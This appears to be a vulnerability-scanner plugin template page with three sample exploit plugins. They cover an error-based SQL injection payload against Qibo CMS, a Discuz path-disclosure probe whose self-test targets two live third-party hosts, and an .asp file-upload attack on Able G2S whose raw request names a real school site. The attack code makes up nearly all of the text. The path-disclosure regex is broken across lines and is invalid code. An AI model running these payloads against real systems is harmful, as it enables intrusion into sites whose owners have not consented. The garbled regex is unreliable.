插件助手
作者:
名称:
参考:
服务:
目标:
Payload:
Flag:
漏洞级别
note
info
warning
hole
判断方式
字符串
正则
发送方式:
Post/Cookies
Raw
Post:
Cookies:
Raw:
RetCode:
样例代码:
sql注入
路径泄漏
文件上传
#!/usr/bin/env python #-*- coding:utf-8 -*- #__SerType:Qibo Blogsystem SQL-Injection def assign(service, arg): if service == fingerprint.qibocms: return True, arg def audit(arg): payload = 'blog/index.php?file=listbbs&uid=1&id=1&TB_pre=qb_module%20where%201=1%20or%20updatexml(2,concat(0x7e,(md5(1))),0)%20%23' target = arg + payload code, head, body, final_url, log = hackhttp.http(target) if code == 200 and 'c4ca4238a0b923820dcc509a6f75849' in body: security_hole(target, log=log) if __name__ == '__main__': from dummy import * audit(assign(fingerprint.qibocms, 'http://www.example.com/')[1])
#!/usr/bin/env python
# Scanner plugin sample: Discuz path disclosure. Requesting
# uc_server/control/admin/db.php directly is expected, on an affected install,
# to return an error page of the form "... not found in <path> on line <n>"
# that leaks the server-side file path. The names fingerprint, hackhttp,
# security_info and dummy are provided by the host scanner framework.
import re


def assign(service, arg):
    # Claim the target only when the host fingerprinted it as discuz;
    # for any other service the function falls through and returns None.
    if service == fingerprint.discuz:
        return True, arg


def audit(arg):
    url = arg
    # Assumes hackhttp.http returns (status, headers, body, final_url, log)
    # in that order — TODO confirm against the framework.
    code, head, res, final_url, log = hackhttp.http(url + 'uc_server/control/admin/db.php')
    if code == 200:
        # NOTE(review): this pattern literal is split across several lines in
        # the listing, which is not valid Python. The markup that originally
        # sat between "not found in", the captured path and "on line" appears
        # to have been dropped in extraction; restore the pattern from the
        # original plugin (as a raw string) before use.
        m = re.search('not found in
([^<]+)
on line
(\d+)
', res)
        if m:
            # The finding is the leaked path itself (capture group 1);
            # the line number (group 2) is not reported.
            security_info(m.group(1))


if __name__ == '__main__':
    # Standalone self-test using the framework's dummy implementations.
    # NOTE(review): unlike the other samples, this self-test points at two
    # live third-party hostnames rather than an example address.
    from dummy import *
    audit(assign(fingerprint.discuz, 'http://www.ytjt.com.cn/')[1])
    audit(assign(fingerprint.discuz, 'http://www.lockbay.cn/')[1])
#!/usr/bin/python #-*- encoding:utf-8 -*- #__author__ = '1c3z' #ref http://wooyun.org/bugs/wooyun-2010-099059 def assign(service, arg): if service == fingerprint.able_g2s: return True, arg def audit(arg): raw = """POST AdminSpace/PublicClass/AddVideoCourseWare.ashx?action=UploadImage HTTP/1.1 Host: kczx.sus.edu.cn Content-Length: 563 Origin: http://kczx.sus.edu.cn X-Requested-With: ShockwaveFlash/17.0.0.188 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.130 Chrome/43.0.2357.130 Safari/537.36 Content-Type: multipart/form-data; boundary=----------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: ASP.NET_SessionId=a50pid55regfww55fticke45; ASPSESSIONIDCSQCRDCB=OJIBGEKDDNFGACCBKDCCJKDH ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="Filename" asp.asp ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="folder" /G2S/AdminSpace/PublicClass/ ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="Filedata"; filename="asp.asp" Content-Type: application/octet-stream zddfggsfagsdfhdfjskjhsdfkfk ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="Upload" Submit Query ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6--""" url = arg + 'G2S/AdminSpace/PublicClass/AddVideoCourseWare.ashx?action=UploadImage' code, head,res, final_url, log = hackhttp.http(url,raw=raw) if '.asp' not in res or '<' in res: return url = arg + 'download/' + res code, head,res, final_url, log2= hackhttp.http(url) if code == 200 and 'zddfggsfagsdfhdfjskjhsdfkfk' in res: security_hole(url, log=log) if __name__ == '__main__': from dummy import * audit(assign(fingerprint.able_g2s, 'http://www.example.com/')[1])